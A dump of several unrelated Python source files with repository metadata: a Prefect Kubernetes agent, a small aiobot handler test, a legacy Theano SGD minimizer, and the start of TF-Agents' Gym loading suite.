prefect agent kubernetes start --env MY_SECRET_KEY=secret --env OTHER_VAR=$OTHER_VAR
```
These can also be used to control the k8s job spec that describes the flow run jobs.
For example, to set the k8s secret used to pull images from a non-public registry:
```
prefect agent kubernetes start --env IMAGE_PULL_SECRETS=my-img-pull-secret
```
For details on the available environment variables for customizing the job spec,
see `help(KubernetesAgent.generate_job_spec_from_environment)`.
Specifying a namespace for the agent will create flow run jobs in that namespace:
```
prefect agent kubernetes start --namespace dev
```
Args:
- agent_config_id (str, optional): An optional agent configuration ID that can be used to set
configuration based on an agent from a backend API. If set all configuration values will be
pulled from backend agent configuration.
- namespace (str, optional): A Kubernetes namespace to create jobs in. Defaults
to the environment variable `NAMESPACE` or `default`.
- job_template_path (str, optional): A path to a job template file to use instead
of the default.
- name (str, optional): An optional name to give this agent. Can also be set through
the environment variable `PREFECT__CLOUD__AGENT__NAME`. Defaults to "agent"
- labels (List[str], optional): a list of labels, which are arbitrary string
identifiers used by Prefect Agents when polling for work
- env_vars (dict, optional): a dictionary of environment variables and values that will
be set on each flow run that this agent submits for execution and in the agent's
own environment
- max_polls (int, optional): maximum number of times the agent will poll Prefect Cloud
for flow runs; defaults to infinite
- agent_address (str, optional): Address to serve internal API at. Currently this is
just health checks for use by an orchestration layer. Leave blank for no API server
(default).
- no_cloud_logs (bool, optional): Disable logging to a Prefect backend for this agent
and all deployed flow runs
- volume_mounts (list, optional): A list of volumeMounts to mount when a job is
run. The volumeMounts in the list should be specified as dicts
i.e `[{"name": "my-vol", "mountPath": "/mnt/my-mount"}]`
- volumes (list, optional): A list of volumes to make available to be mounted when a
job is run. The volumes in the list should be specified as nested dicts.
i.e `[{"name": "my-vol", "csi": {"driver": "secrets-store.csi.k8s.io"}}]`
"""
def __init__(
self,
agent_config_id: str = None,
namespace: str = None,
job_template_path: str = None,
name: str = None,
labels: Iterable[str] = None,
env_vars: dict = None,
max_polls: int = None,
agent_address: str = None,
no_cloud_logs: bool = False,
volume_mounts: List[dict] = None,
volumes: List[dict] = None,
) -> None:
super().__init__(
agent_config_id=agent_config_id,
name=name,
labels=labels,
env_vars=env_vars,
max_polls=max_polls,
agent_address=agent_address,
no_cloud_logs=no_cloud_logs,
)
self.namespace = namespace or os.getenv("NAMESPACE", "default")
self.job_template_path = job_template_path or DEFAULT_JOB_TEMPLATE_PATH
self.volume_mounts = volume_mounts
self.volumes = volumes
from kubernetes import client, config
try:
self.logger.debug("Loading incluster configuration")
config.load_incluster_config()
except config.config_exception.ConfigException as exc:
self.logger.warning(
"{} Using out of cluster configuration option.".format(exc)
)
self.logger.debug("Loading out of cluster configuration")
config.load_kube_config()
self.batch_client = client.BatchV1Api()
self.core_client = client.CoreV1Api()
self.k8s_client = client
self.logger.debug(f"Namespace: {self.namespace}")
def manage_jobs(self) -> None:
"""
This function checks if jobs are `Failed` or `Succeeded` and if they are then the jobs are
deleted from the namespace. If one of the job's pods happen to run into image pulling errors
then the flow run is failed and the job is still deleted.
"""
self.logger.debug(
"Retrieving information of jobs that are currently in the cluster..."
)
more = True
_continue = ""
while more:
try:
jobs = self.batch_client.list_namespaced_job(
namespace=self.namespace,
label_selector="prefect.io/identifier",
limit=20,
_continue=_continue,
)
_continue = jobs.metadata._continue
more = bool(_continue)
for job in jobs.items:
delete_job = job.status.failed or job.status.succeeded
job_name = job.metadata.name
flow_run_id = job.metadata.labels.get("prefect.io/flow_run_id")
# Check for pods that are stuck with image pull errors
if not delete_job:
pods = self.core_client.list_namespaced_pod(
namespace=self.namespace,
label_selector="prefect.io/identifier={}".format(
job.metadata.labels.get("prefect.io/identifier")
),
)
for pod in pods.items:
if pod.status.container_statuses:
for container_status in pod.status.container_statuses:
waiting = container_status.state.waiting
if waiting and (
waiting.reason == "ErrImagePull"
or waiting.reason == "ImagePullBackOff"
):
self.logger.debug(
f"Failing flow run {flow_run_id} due to pod {waiting.reason}"
)
self.client.set_flow_run_state(
flow_run_id=flow_run_id,
state=Failed(
message="Kubernetes Error: {}".format(
container_status.state.waiting.message
)
),
)
delete_job = True
break
# Report failed pods
if job.status.failed:
pods = self.core_client.list_namespaced_pod(
namespace=self.namespace,
label_selector="prefect.io/identifier={}".format(
job.metadata.labels.get("prefect.io/identifier")
),
)
failed_pods = []
for pod in pods.items:
if pod.status.phase != "Failed":
continue
# Format pod failure error message
failed_pods.append(pod.metadata.name)
pod_status_logs = [f"Pod {pod.metadata.name} failed."]
for status in pod.status.container_statuses:
state = (
"running"
if status.state.running
else "waiting"
if status.state.waiting
else "terminated"
if status.state.terminated
else "Not Found"
)
pod_status_logs.append(
f"\tContainer '{status.name}' state: {state}"
)
if status.state.terminated:
pod_status_logs.append(
f"\t\tExit Code:: {status.state.terminated.exit_code}"
)
if status.state.terminated.message:
pod_status_logs.append(
f"\t\tMessage: {status.state.terminated.message}"
)
if status.state.terminated.reason:
pod_status_logs.append(
f"\t\tReason: {status.state.terminated.reason}"
)
if status.state.terminated.signal:
pod_status_logs.append(
f"\t\tSignal: {status.state.terminated.signal}"
)
# Send pod failure information to flow run logs
self.client.write_run_logs(
[
dict(
flow_run_id=flow_run_id,
name=self.name,
message="\n".join(pod_status_logs),
level="ERROR",
)
]
)
# If there are failed pods and the run is not finished, fail the run
if (
failed_pods
and not self.client.get_flow_run_state(
flow_run_id
).is_finished()
):
self.logger.debug(
f"Failing flow run {flow_run_id} due to the failed pods {failed_pods}"
)
self.client.set_flow_run_state(
flow_run_id=flow_run_id,
state=Failed(
message="Kubernetes Error: pods {} failed for this job".format(
failed_pods
)
),
)
# Delete job if it is successful or failed
if delete_job:
self.logger.debug(f"Deleting job {job_name}")
try:
self.batch_client.delete_namespaced_job(
name=job_name,
namespace=self.namespace,
body=self.k8s_client.V1DeleteOptions(
propagation_policy="Foreground"
),
)
except self.k8s_client.rest.ApiException as exc:
if exc.status != 404:
self.logger.error(
f"{exc.status} error attempting to delete job {job_name}"
)
except self.k8s_client.rest.ApiException as exc:
if exc.status == 410:
self.logger.debug("Refreshing job listing token...")
_continue = ""
continue
else:
self.logger.debug(exc)
def heartbeat(self) -> None:
"""
Check status of jobs created by this agent, delete completed jobs and failed containers.
"""
try:
self.manage_jobs()
except Exception:
self.logger.error("Error while managing existing k8s jobs", exc_info=True)
super().heartbeat()
def deploy_flow(self, flow_run: GraphQLResult) -> str:
"""
Deploy flow runs on to a k8s cluster as jobs
Args:
- flow_run (GraphQLResult): A GraphQLResult flow run object
Returns:
- str: Information about the deployment
"""
import urllib3.exceptions
self.logger.info("Deploying flow run {}".format(flow_run.id)) # type: ignore
job_spec = self.generate_job_spec(flow_run=flow_run)
job_name = job_spec["metadata"]["name"]
self.logger.debug("Creating namespaced job {}".format(job_name))
attempts = 3
while True:
try:
self.batch_client.create_namespaced_job(
namespace=self.namespace, body=job_spec
)
break
except self.k8s_client.rest.ApiException as exc:
if exc.status == 409:
# object already exists, previous submission was successful
# even though it errored
break
raise
except urllib3.exceptions.HTTPError:
attempts -= 1
if attempts == 0:
raise
self.logger.warning(
"Error submitting job %s, retrying...", job_name, exc_info=True
)
time.sleep(1)
self.logger.debug("Job {} created".format(job_name))
return "Job {}".format(job_name)
def generate_job_spec(self, flow_run: GraphQLResult) -> dict:
"""Generate a k8s job spec for a flow run
Args:
- flow_run (GraphQLResult): A flow run object
Returns:
- dict: a dictionary representation of a k8s job for flow execution
"""
run_config = self._get_run_config(flow_run, KubernetesRun)
assert run_config is None or isinstance(run_config, KubernetesRun) # mypy
if run_config is not None:
return self.generate_job_spec_from_run_config(flow_run, run_config)
else:
return self.generate_job_spec_from_environment(flow_run)
def generate_job_spec_from_environment(
self, flow_run: GraphQLResult, image: str = None
) -> dict:
"""
Populate a k8s job spec. This spec defines a k8s job that handles
executing a flow. This method runs each time the agent receives
a flow to run.
That job spec can optionally be customized by setting the
following environment variables on the agent.
- `NAMESPACE`: the k8s namespace the job will run in, defaults to `"default"`
- `JOB_MEM_REQUEST`: memory requested, for example, `256Mi` for 256 MB. If this
environment variable is not set, the cluster's defaults will be used.
- `JOB_MEM_LIMIT`: memory limit, for example, `512Mi` For 512 MB. If this
environment variable is not set, the cluster's defaults will be used.
- `JOB_CPU_REQUEST`: CPU requested, defaults to `"100m"`
- `JOB_CPU_LIMIT`: CPU limit, defaults to `"100m"`
- `IMAGE_PULL_POLICY`: policy for pulling images. Defaults to `"IfNotPresent"`.
- `IMAGE_PULL_SECRETS`: name of an existing k8s secret that can be used to pull
images. This is necessary if your flow uses an image that is in a non-public
container registry, such as Amazon ECR, or in a public registry that requires
authentication to avoid hitting rate limits. To specify multiple image pull
secrets, provide a comma-delimited string with no spaces, like
`"some-secret,other-secret"`.
- `SERVICE_ACCOUNT_NAME`: name of a service account to run the job as.
By default, none is specified.
- `YAML_TEMPLATE`: a path to where the YAML template should be loaded from. defaults
to the embedded `job_spec.yaml`.
Args:
- flow_run (GraphQLResult): A flow run object
- image (str, optional): The full name of an image to use for the job
Returns:
- dict: a dictionary representation of a k8s job for flow execution
"""
identifier = str(uuid.uuid4())[:8]
yaml_path = os.getenv(
"YAML_TEMPLATE", os.path.join(os.path.dirname(__file__), "job_spec.yaml")
)
with open(yaml_path, "r") as job_file:
job = yaml.safe_load(job_file)
job_name = "prefect-job-{}".format(identifier)
# Populate job metadata for identification
k8s_labels = {
"prefect.io/identifier": identifier,
"prefect.io/flow_run_id": flow_run.id, # type: ignore
"prefect.io/flow_id": flow_run.flow.id, # type: ignore
}
job["metadata"]["name"] = job_name
job["metadata"]["labels"].update(**k8s_labels)
job["spec"]["template"]["metadata"]["labels"].update(**k8s_labels)
# Use provided image for job
if image is None:
image = get_flow_image(flow_run=flow_run)
job["spec"]["template"]["spec"]["containers"][0]["image"] = image
self.logger.debug("Using image {} for job".format(image))
# Datermine flow run command
job["spec"]["template"]["spec"]["containers"][0]["args"] = [
get_flow_run_command(flow_run)
]
# Populate environment variables for flow run execution
env = job["spec"]["template"]["spec"]["containers"][0]["env"]
env[0]["value"] = config.cloud.api or "https://api.prefect.io"
env[1]["value"] = config.cloud.agent.auth_token
env[2]["value"] = flow_run.id # type: ignore
env[3]["value"] = flow_run.flow.id # type: ignore
env[4]["value"] = os.getenv("NAMESPACE", "default")
env[5]["value"] = str(self.labels)
env[6]["value"] = str(self.log_to_cloud).lower()
env[7]["value"] = config.logging.level
# append all user provided values
for key, value in self.env_vars.items():
env.append(dict(name=key, value=value))
# Use image pull secrets if provided
image_pull_secrets = os.getenv("IMAGE_PULL_SECRETS")
if image_pull_secrets:
secrets = image_pull_secrets.split(",")
for idx, secret_name in enumerate(secrets):
# this check preserves behavior from previous releases,
# where prefect would only overwrite the first entry in
# imagePullSecrets
if idx == 0:
job["spec"]["template"]["spec"]["imagePullSecrets"][0] = {
"name": secret_name
}
else:
job["spec"]["template"]["spec"]["imagePullSecrets"].append(
{"name": secret_name}
)
else:
del job["spec"]["template"]["spec"]["imagePullSecrets"]
# Set resource requirements if provided
resources = job["spec"]["template"]["spec"]["containers"][0]["resources"]
if os.getenv("JOB_MEM_REQUEST"):
resources["requests"]["memory"] = os.getenv("JOB_MEM_REQUEST")
if os.getenv("JOB_MEM_LIMIT"):
resources["limits"]["memory"] = os.getenv("JOB_MEM_LIMIT")
if os.getenv("JOB_CPU_REQUEST"):
resources["requests"]["cpu"] = os.getenv("JOB_CPU_REQUEST")
if os.getenv("JOB_CPU_LIMIT"):
resources["limits"]["cpu"] = os.getenv("JOB_CPU_LIMIT")
if self.volume_mounts:
job["spec"]["template"]["spec"]["containers"][0][
"volumeMounts"
] = self.volume_mounts
else:
del job["spec"]["template"]["spec"]["containers"][0]["volumeMounts"]
if self.volumes:
job["spec"]["template"]["spec"]["volumes"] = self.volumes
else:
del job["spec"]["template"]["spec"]["volumes"]
if os.getenv("IMAGE_PULL_POLICY"):
job["spec"]["template"]["spec"]["containers"][0][
"imagePullPolicy"
] = os.getenv("IMAGE_PULL_POLICY")
if os.getenv("SERVICE_ACCOUNT_NAME"):
job["spec"]["template"]["spec"]["serviceAccountName"] = os.getenv(
"SERVICE_ACCOUNT_NAME"
)
return job
def generate_job_spec_from_run_config(
self, flow_run: GraphQLResult, run_config: KubernetesRun
) -> dict:
"""Generate a k8s job spec for a flow run.
Args:
- flow_run (GraphQLResult): A flow run object
- run_config (KubernetesRun): The flow run's run_config
Returns:
- dict: a dictionary representation of a k8s job for flow execution
"""
if run_config.job_template:
job = run_config.job_template
else:
job_template_path = run_config.job_template_path or self.job_template_path
self.logger.debug("Loading job template from %r", job_template_path)
template_bytes = read_bytes_from_path(job_template_path)
job = yaml.safe_load(template_bytes)
identifier = uuid.uuid4().hex[:8]
job_name = f"prefect-job-{identifier}"
# Populate job metadata for identification
k8s_labels = {
"prefect.io/identifier": identifier,
"prefect.io/flow_run_id": flow_run.id, # type: ignore
"prefect.io/flow_id": flow_run.flow.id, # type: ignore
}
_get_or_create(job, "metadata.labels")
_get_or_create(job, "spec.template.metadata.labels")
job["metadata"]["name"] = job_name
job["metadata"]["labels"].update(**k8s_labels)
job["spec"]["template"]["metadata"]["labels"].update(**k8s_labels)
# Get the first container, which is used for the prefect job
containers = _get_or_create(job, "spec.template.spec.containers", [])
if not containers:
containers.append({})
container = containers[0]
# Set container image
container["image"] = image = get_flow_image(flow_run)
# Set flow run command
container["args"] = [get_flow_run_command(flow_run)]
# Populate environment variables from the following sources,
# with precedence:
# - Values required for flow execution, hardcoded below
# - Values set on the KubernetesRun object
# - Values set using the `--env` CLI flag on the agent
# - Values in the job template
env = self.env_vars.copy()
if run_config.env:
env.update(run_config.env)
env.update(
{
"PREFECT__CLOUD__API": config.cloud.api,
"PREFECT__CLOUD__AUTH_TOKEN": config.cloud.agent.auth_token,
"PREFECT__CLOUD__USE_LOCAL_SECRETS": "false",
"PREFECT__CONTEXT__FLOW_RUN_ID": flow_run.id,
"PREFECT__CONTEXT__FLOW_ID": flow_run.flow.id,
"PREFECT__CONTEXT__IMAGE": image,
"PREFECT__LOGGING__LOG_TO_CLOUD": str(self.log_to_cloud).lower(),
"PREFECT__ENGINE__FLOW_RUNNER__DEFAULT_CLASS": "prefect.engine.cloud.CloudFlowRunner",
"PREFECT__ENGINE__TASK_RUNNER__DEFAULT_CLASS": "prefect.engine.cloud.CloudTaskRunner",
}
)
container_env = [{"name": k, "value": v} for k, v in env.items()]
for entry in container.get("env", []):
if entry["name"] not in env:
container_env.append(entry)
container["env"] = container_env
# Set resource requirements if provided
_get_or_create(container, "resources.requests")
_get_or_create(container, "resources.limits")
resources = container["resources"]
if run_config.memory_request:
resources["requests"]["memory"] = run_config.memory_request
if run_config.memory_limit:
resources["limits"]["memory"] = run_config.memory_limit
if run_config.cpu_request:
resources["requests"]["cpu"] = run_config.cpu_request
if run_config.cpu_limit:
resources["limits"]["cpu"] = run_config.cpu_limit
return job
@staticmethod
def generate_deployment_yaml(
token: str = None,
api: str = None,
namespace: str = None,
image_pull_secrets: str = None,
resource_manager_enabled: bool = False,
rbac: bool = False,
latest: bool = False,
mem_request: str = None,
mem_limit: str = None,
cpu_request: str = None,
cpu_limit: str = None,
image_pull_policy: str = None,
service_account_name: str = None,
labels: Iterable[str] = None,
env_vars: dict = None,
backend: str = None,
) -> str:
"""
Generate and output an installable YAML spec for the agent.
Args:
- token (str, optional): A `RUNNER` token to give the agent
- api (str, optional): A URL pointing to the Prefect API. Defaults to
`https://api.prefect.io`
- namespace (str, optional): The namespace to create Prefect jobs in. Defaults
to `default`
- image_pull_secrets (str, optional): The name of an image pull secret to use
for Prefect jobs
- resource_manager_enabled (bool, optional): Whether to include the resource
manager as part of the YAML. Defaults to `False`
- rbac (bool, optional): Whether to include default RBAC configuration as
part of the YAML. Defaults to `False`
- latest (bool, optional): Whether to use the `latest` Prefect image.
Defaults to `False`
- mem_request (str, optional): Requested memory for Prefect init job.
- mem_limit (str, optional): Limit memory for Prefect init job.
- cpu_request (str, optional): Requested CPU for Prefect init job.
- cpu_limit (str, optional): Limit CPU for Prefect init job.
- image_pull_policy (str, optional): imagePullPolicy to use for Prefect init job.
Job defaults to `IfNotPresent`.
- service_account_name (str, optional): Name of a service account to use for
Prefect init job. Job defaults to using `default` service account.
- labels (List[str], optional): a list of labels, which are arbitrary string
identifiers used by Prefect Agents when polling for work
- env_vars (dict, optional): additional environment variables to attach to all
jobs created by this agent and to set in the agent's own environment
- backend (str, optional): toggle which backend to use for this agent.
Defaults to backend currently set in config.
Returns:
- str: A string representation of the generated YAML
"""
# Use defaults if not provided
token = token or ""
api = api or "https://api.prefect.io"
namespace = namespace or "default"
labels = labels or []
mem_request = mem_request or ""
mem_limit = mem_limit or ""
cpu_request = cpu_request or ""
cpu_limit = cpu_limit or ""
image_pull_policy = image_pull_policy or ""
service_account_name = service_account_name or ""
backend = backend or config.backend
version = prefect.__version__.split("+")
image_version = (
"latest" if len(version) > 1 or latest else (version[0] + "-python3.6")
)
with open(
os.path.join(os.path.dirname(__file__), "deployment.yaml"), "r"
) as deployment_file:
deployment = yaml.safe_load(deployment_file)
agent_env = deployment["spec"]["template"]["spec"]["containers"][0]["env"]
# Populate env vars
agent_env[0]["value"] = token
agent_env[1]["value"] = api
agent_env[2]["value"] = namespace
agent_env[3]["value"] = image_pull_secrets or ""
agent_env[4]["value"] = str(labels)
agent_env[11]["value"] = backend
# Populate job resource env vars
agent_env[5]["value"] = mem_request
agent_env[6]["value"] = mem_limit
agent_env[7]["value"] = cpu_request
agent_env[8]["value"] = cpu_limit
agent_env[9]["value"] = image_pull_policy
agent_env[10]["value"] = service_account_name
if env_vars:
agent_env.append(
{
"name": "PREFECT__CLOUD__AGENT__ENV_VARS",
"value": json.dumps(env_vars),
}
)
# Use local prefect version for image
deployment["spec"]["template"]["spec"]["containers"][0][
"image"
] = "prefecthq/prefect:{}".format(image_version)
# Populate resource manager if requested
if resource_manager_enabled:
resource_manager_env = deployment["spec"]["template"]["spec"]["containers"][
1
]["env"]
resource_manager_env[0]["value"] = token
resource_manager_env[1]["value"] = api
resource_manager_env[3]["value"] = namespace
# Use local prefect version for image
deployment["spec"]["template"]["spec"]["containers"][1][
"image"
] = "prefecthq/prefect:{}".format(image_version)
else:
del deployment["spec"]["template"]["spec"]["containers"][1]
# Populate image pull secrets if provided
if image_pull_secrets:
agent_env = deployment["spec"]["template"]["spec"]["imagePullSecrets"][0][
"name"
] = image_pull_secrets
else:
del deployment["spec"]["template"]["spec"]["imagePullSecrets"]
# Load RBAC if specified
rbac_yaml = []
if rbac:
with open(
os.path.join(os.path.dirname(__file__), "rbac.yaml"), "r"
) as rbac_file:
rbac_generator = yaml.safe_load_all(rbac_file)
for document in rbac_generator:
document["metadata"]["namespace"] = namespace
rbac_yaml.append(document)
output_yaml = [deployment]
output_yaml.extend(rbac_yaml)
return yaml.safe_dump_all(output_yaml, explicit_start=True)
if __name__ == "__main__":
KubernetesAgent().start()
| 43.922252
| 105
| 0.545993
|
978788facb610507b3568ad240bfc3ea895c3525
| 765
|
py
|
Python
|
tests/test_handlers.py
|
thedyrn/aio-vkbot
|
7f6187eafb5fdc9dab8fcc36172a273fad6ce1ab
|
[
"MIT"
] | 2
|
2020-02-06T18:06:56.000Z
|
2021-02-20T23:03:09.000Z
|
tests/test_handlers.py
|
thedyrn/aio-vkbot
|
7f6187eafb5fdc9dab8fcc36172a273fad6ce1ab
|
[
"MIT"
] | null | null | null |
tests/test_handlers.py
|
thedyrn/aio-vkbot
|
7f6187eafb5fdc9dab8fcc36172a273fad6ce1ab
|
[
"MIT"
] | null | null | null |
import pytest
from unittest.mock import Mock
from aiobot import Handler, MessageHandler, CommandHandler, VkEventType, Update
@pytest.fixture
def update_from_dict(raw_new_message_update):
return Update.from_dict(raw_new_message_update)
def test_handler(update_from_dict):
mocked_callback = Mock()
h = Handler(mocked_callback, VkEventType.MESSAGE_NEW)
assert h.check_update(update_from_dict)
h.handle_update(update_from_dict, Mock())
assert mocked_callback.called
def test_message_handler(update_from_dict):
mocked_callback = Mock()
h = MessageHandler(mocked_callback)
assert h.check_update(update_from_dict)
h.handle_update(update_from_dict, Mock())
assert mocked_callback.called
# TODO CommandHandler добавить
| 28.333333
| 79
| 0.789542
|
896cf9d927032462cc82aeae4962fa287bbf6cd2
| 7,973
|
py
|
Python
|
autodiff/fmin_sgd.py
|
gwtaylor/pyautodiff
|
7973e26f1c233570ed4bb10d08634ec7378e2152
|
[
"BSD-3-Clause"
] | 59
|
2015-02-03T20:50:59.000Z
|
2020-05-26T05:38:54.000Z
|
autodiff/fmin_sgd.py
|
gwtaylor/pyautodiff
|
7973e26f1c233570ed4bb10d08634ec7378e2152
|
[
"BSD-3-Clause"
] | 3
|
2015-05-10T06:22:45.000Z
|
2016-12-06T02:20:58.000Z
|
autodiff/fmin_sgd.py
|
gwtaylor/pyautodiff
|
7973e26f1c233570ed4bb10d08634ec7378e2152
|
[
"BSD-3-Clause"
] | 11
|
2015-04-15T16:52:09.000Z
|
2017-06-28T12:10:39.000Z
|
"""
Function minimization drivers based on stochastic gradient descent (SGD).
"""
import gc
import logging
import sys
import time
import numpy as np
import theano
from .context import Context
from .utils import flat_from_doc, doc_from_flat
from .utils import post_collect
logger = logging.getLogger(__name__)
info = logger.info
warn = logger.warn
raise NotImplementedError(
'fmin_sgd is a legacy file not supported in the current version of '
'PyAutoDiff (yet!)')
class FMinSGD(object):
"""
An iterator implementing the stochastic gradient descent algorithm.
On each iteration, this function increments each of self.current_args by
`-step_size` times its gradient gradient wrt `fn`, and returns the current
[stochastic] calculation of `fn`.
"""
def __init__(self, fn, args, streams, step_size, loops=1,
step_size_backoff=0.25,
theano_mode=None,
theano_device=None,
rseed=12345,
floatX='float64',
):
"""
fn - a callable taking *(args + (stream[i],))
args - the arguments of fn, which this function will search
stream - a dictionary of iterables (i.e. struct of arrays)
These must all have the same length, and FMinSGD will iterate
through them jointly, passing the i'th element of each
sequence to `fn` to get a gradient estimate.
step_size - a multiplier on the negative gradient used for search
- a float will be used for all args
- a tuple of floats will use each float for each arg
- a tuple of ndarrays will use each ndarray for each arg
- floats and ndarrays can both be used in a tuple here
theano_mode - (API leak) how to compile the underlying theano
function.
theano_device - (API leak) optional string to force cpu/gpu execution
"""
self.rng = np.random.RandomState(rseed)
self.step_size_backoff = step_size_backoff
ctxt = Context(device=theano_device, floatX=floatX)
s_streams0 = {} # -- symbolic element dictionary
streams0 = {} # -- non-symbolic first element dictionary
_len = sys.maxint
s_stream_idx = ctxt.shared(np.asarray(0), name='stream_idx')
s_idxs = ctxt.shared(self.rng.randint(2, size=3), name='idxs')
s_idx = s_idxs[s_stream_idx]
for key, stream in streams.items():
stream0 = stream[0]
s_stream = ctxt.shared(stream, borrow=True)
s_stream_i = s_stream[s_idx]
assert s_stream_i.dtype == str(stream0.dtype)
if hasattr(stream, 'shape'):
# -- if stream is a tensor, then all elements have same size
# so bake stream0's size into the function.
ctxt.shadow(stream0, s_stream_i.reshape(stream0.shape))
else:
raise NotImplementedError('non ndarray stream', stream)
streams0[key] = stream0
s_streams0[key] = s_stream_i
_len = min(_len, len(stream))
# -- pass params as args, streams as kwawrgs
cost = ctxt.call(fn, args, streams0)
flat_args = flat_from_doc(args)
s_args = [ctxt.svars[id(w)] for w in flat_args]
s_cost = ctxt.svars[id(cost)]
# -- if step_size is a scalar, expand it out to match the args
try:
float(step_size)
step_size = (step_size,) * len(args)
except TypeError:
pass
s_step_sizes = [ctxt.shared(np.asarray(step)) for step in step_size]
if len(s_step_sizes) != len(args):
raise ValueError('len of step_size tuple must match len of args')
s_costs = ctxt.shared(np.zeros(3, dtype=s_cost.dtype), name='costs')
del ctxt
gc.collect()
#theano.printing.debugprint(s_cost)
g_args = theano.tensor.grad(s_cost, s_args,
disconnected_inputs='warn',
)
# -- shared var into which we will write stream entries
updates = [(a, a - theano.tensor.cast(s_step, a.dtype) * g)
for s_step, a, g, in zip(s_step_sizes, s_args, g_args)]
updates += [(s_stream_idx, s_stream_idx + 1)]
updates += [(s_costs,
theano.tensor.inc_subtensor(s_costs[s_stream_idx], s_cost))]
update_fn = theano.function([], [],
updates=updates,
mode=theano_mode,
#profile=1,
)
# theano.printing.debugprint(update_fn)
self.args = args
self.loops = loops
self.streams = streams
self.s_args = s_args
self.s_cost = s_cost
self.g_args = g_args
self.s_streams0 = s_streams0
self.update_fn = update_fn
self._len = _len
self.s_step_sizes = s_step_sizes
self.s_stream_idx = s_stream_idx
self.s_costs = s_costs
self.s_idxs = s_idxs
self.ii = 0
self.cost_history = []
def __iter__(self):
return self
def nextN(self, N, force=False):
# Theano's cvm has a really low-overhead direct call
# interface, which does not permit argument-passing.
# so we set up all the indexes we want to use in shared
# variables, and the s_stream_idx iterates over our list
# of randomly chosen indexes, and fills in the costs into
# self.s_costs.
fn = self.update_fn.fn
if force:
_N = N
else:
_N = min(N, int(self._len * self.loops) - self.ii)
if _N <= 0:
return []
idxs = self.rng.randint(self._len, size=_N)
self.s_stream_idx.set_value(0)
self.s_idxs.set_value(
idxs,
borrow=True)
self.s_costs.set_value(
np.zeros(_N, dtype=self.s_costs.dtype),
borrow=True)
args_backup = [a.get_value() for a in self.s_args]
try:
# when using the cvm, there is a special calling form
# that uses an internal for-loop
fn(n_calls=_N)
except TypeError:
for i in xrange(_N):
fn()
rval = self.s_costs.get_value()
if np.isfinite(rval[-1]):
self.cost_history.append(np.mean(rval))
else:
info('decreasing step sizes by %f' % self.step_size_backoff)
[s_step.set_value(s_step.get_value() * self.step_size_backoff)
for s_step in self.s_step_sizes]
[s_a.set_value(a, borrow=True)
for s_a, a in zip(self.s_args, args_backup)]
if len(self.cost_history) > 3:
if not (self.cost_history[-1] <= self.cost_history[-3]):
info('decreasing step sizes by %f' % self.step_size_backoff)
[s_step.set_value(s_step.get_value() * self.step_size_backoff)
for s_step in self.s_step_sizes]
self.ii += len(rval)
return rval
def next(self, N=None):
rval = self.nextN(1)
if rval:
return rval[0]
else:
raise StopIteration()
@property
def current_args(self):
vals = [a.get_value() for a in self.s_args]
rval, pos = doc_from_flat(self.args, vals, 0)
assert pos == len(vals)
return rval
@post_collect
def fmin_sgd(*args, **kwargs):
"""
See FMinSGD for documentation. This function creates that object, exhausts
the iterator, and then returns the final self.current_args values.
"""
print_interval = kwargs.pop('print_interval', sys.maxint)
obj = FMinSGD(*args, **kwargs)
while True:
t = time.time()
vals = obj.nextN(print_interval)
if len(vals):
print 'Value', np.mean(vals), 'time', (time.time() - t)
else:
break
return obj.current_args
| 34.515152
| 78
| 0.590117
|
458e61de53a9538b87cceba1e398ab89f3eaa18f
| 5,130
|
py
|
Python
|
tf_agents/environments/suite_gym.py
|
Bhaney44/agents
|
e5fd5b19ba86fbc5980c9f8e173ce959f8b7bb45
|
[
"Apache-2.0"
] | 4
|
2020-06-25T00:47:40.000Z
|
2021-07-07T15:07:59.000Z
|
tf_agents/environments/suite_gym.py
|
Bhaney44/agents
|
e5fd5b19ba86fbc5980c9f8e173ce959f8b7bb45
|
[
"Apache-2.0"
] | null | null | null |
tf_agents/environments/suite_gym.py
|
Bhaney44/agents
|
e5fd5b19ba86fbc5980c9f8e173ce959f8b7bb45
|
[
"Apache-2.0"
] | 1
|
2020-08-18T13:32:15.000Z
|
2020-08-18T13:32:15.000Z
|
# coding=utf-8
# Copyright 2018 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Suite for loading Gym Environments.
Note we use gym.spec(env_id).make() on gym envs to avoid getting a TimeLimit
wrapper on the environment. OpenAI's TimeLimit wrappers terminate episodes
without indicating if the failure is due to the time limit, or due to negative
agent behaviour. This prevents us from setting the appropriate discount value
for the final step of an episode. To prevent that we extract the step limit
from the environment specs and utilize our TimeLimit wrapper.
"""
import gym
from tf_agents.environments import gym_wrapper
from tf_agents.environments import wrappers
import gin.tf
@gin.configurable
def load(environment_name,
discount=1.0,
max_episode_steps=None,
gym_env_wrappers=(),
env_wrappers=(),
spec_dtype_map=None):
"""Loads the selected environment and wraps it with the specified wrappers.
Note that by default a TimeLimit wrapper is used to limit episode lengths
to the default benchmarks defined by the registered environments.
Args:
environment_name: Name for the environment to load.
discount: Discount to use for the environment.
max_episode_steps: If None the max_episode_steps will be set to the default
step limit defined in the environment's spec. No limit is applied if set
to 0 or if there is no timestep_limit set in the environment's spec.
gym_env_wrappers: Iterable with references to wrapper classes to use
directly on the gym environment.
env_wrappers: Iterable with references to wrapper classes to use on the
gym_wrapped environment.
spec_dtype_map: A dict that maps gym specs to tf dtypes to use as the
default dtype for the tensors. An easy way how to configure a custom
mapping through Gin is to define a gin-configurable function that returns
desired mapping and call it in your Gin congif file, for example:
`suite_gym.load.spec_dtype_map = @get_custom_mapping()`.
Returns:
A PyEnvironment instance.
"""
gym_spec = gym.spec(environment_name)
gym_env = gym_spec.make()
if max_episode_steps is None and gym_spec.timestep_limit is not None:
max_episode_steps = gym_spec.max_episode_steps
return wrap_env(
gym_env,
discount=discount,
max_episode_steps=max_episode_steps,
gym_env_wrappers=gym_env_wrappers,
env_wrappers=env_wrappers,
spec_dtype_map=spec_dtype_map)
@gin.configurable
def wrap_env(gym_env,
discount=1.0,
max_episode_steps=None,
gym_env_wrappers=(),
time_limit_wrapper=wrappers.TimeLimit,
env_wrappers=(),
spec_dtype_map=None,
auto_reset=True):
"""Wraps given gym environment with TF Agent's GymWrapper.
Note that by default a TimeLimit wrapper is used to limit episode lengths
to the default benchmarks defined by the registered environments.
Args:
